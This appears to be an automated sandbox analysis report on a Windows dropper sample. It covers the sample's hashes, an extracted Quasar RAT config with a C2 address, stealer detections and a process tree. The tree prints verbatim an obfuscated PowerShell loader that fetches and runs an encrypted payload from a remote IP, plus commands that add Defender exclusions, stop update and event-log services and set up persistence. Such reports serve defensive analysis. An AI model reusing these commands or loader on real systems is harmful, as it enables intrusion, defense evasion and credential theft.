Resubmissions
09-04-2024 08:32
240409-kfg77aaf85 1009-04-2024 08:32
240409-kfglnaaf84 1009-04-2024 08:32
240409-kffz5aea2y 1009-04-2024 08:32
240409-kffpcsaf79 1011-03-2024 08:03
240311-jxm94afe6y 1010-03-2024 15:15
240310-snee9sfd3y 10Analysis
-
max time kernel
517s -
max time network
1007s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
10-03-2024 15:15
General
-
Target
FUCKER.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.1
Office04
209.182.234.69:5000
1d7ed661-c682-43f5-973b-fc9bfdbd96a8
-
encryption_key
ABD5B6E1498842B0D7FFC59005525F3510E9622D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Detect Neshta payload 4 IoCs
-
Detect ZGRat V1 8 IoCs
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 4 IoCs
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Raccoon Stealer V2 payload 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Blocklisted process makes network request 1 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 54 IoCs
-
Modifies system executable filetype association 2 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe 18 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 16 IoCs
-
NSIS installer 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 63 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
Modifies Internet Explorer settings 1 TTPs 10 IoCs
-
Modifies data under HKEY_USERS 50 IoCs
-
Modifies registry class 64 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exeC:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\certutil.exeC:\Windows\System32\certutil.exe5⤵
- Suspicious use of SetThreadContext
-
C:\Windows\explorer.exeexplorer.exe6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_wvvPaL.exe"C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_wvvPaL.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\cacd6bf810543a9d46c9b104dfd72778.exe"C:\Users\Admin\AppData\Local\Temp\Files\cacd6bf810543a9d46c9b104dfd72778.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Hero.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\Hero.exeC:\Users\Admin\AppData\Local\Temp\Files\Hero.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\Digital_Edge_20240227111857983.exe"C:\Users\Admin\AppData\Local\Temp\Files\Digital_Edge_20240227111857983.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\Digital_Edge_20240227111857983.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\Digital_Edge_20240227111857983.exe"4⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ROBLUX~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\ROBLUX~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\ROBLUX~1.EXE4⤵
- Executes dropped EXE
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\WerFault.exeWerFault5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\2311~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\2311~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\2311~1.EXE4⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TJEAJW~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\TJEAJW~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\TJEAJW~1.EXE4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe7⤵
- Creates scheduled task(s)
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\3.exeC:\Users\Admin\AppData\Local\Temp\Files\3.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Files\3.exeC:\Users\Admin\AppData\Local\Temp\Files\3.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\system32\svchost.exe"6⤵
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\VB%20S~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\VB%20S~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\VB%20S~1.EXE4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 22805⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\IDRB5E~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\IDRB5E~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\IDRB5E~1.EXE4⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exeC:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"5⤵
- Launches sc.exe
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exeC:\Users\Admin\AppData\Local\Temp\Files\Creal.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exeC:\Users\Admin\AppData\Local\Temp\Files\Creal.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exeC:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 13325⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\nine.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\nine.exeC:\Users\Admin\AppData\Local\Temp\Files\nine.exe4⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\fu.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\fu.exeC:\Users\Admin\AppData\Local\Temp\Files\fu.exe4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" https://www.youtube.com5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exeC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe https://www.youtube.com6⤵
- Enumerates system info in registry
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exeC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 --annotation=exe=C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x35c,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb07⤵
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe"C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2200 --field-trial-handle=2204,i,14564913232005053714,11852687231911104687,262144 --variations-seed-version /prefetch:27⤵
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe"C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2292 --field-trial-handle=2204,i,14564913232005053714,11852687231911104687,262144 --variations-seed-version /prefetch:37⤵
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe"C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2488 --field-trial-handle=2204,i,14564913232005053714,11852687231911104687,262144 --variations-seed-version /prefetch:87⤵
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe"C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3424 --field-trial-handle=2204,i,14564913232005053714,11852687231911104687,262144 --variations-seed-version /prefetch:17⤵
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe"C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3464 --field-trial-handle=2204,i,14564913232005053714,11852687231911104687,262144 --variations-seed-version /prefetch:17⤵
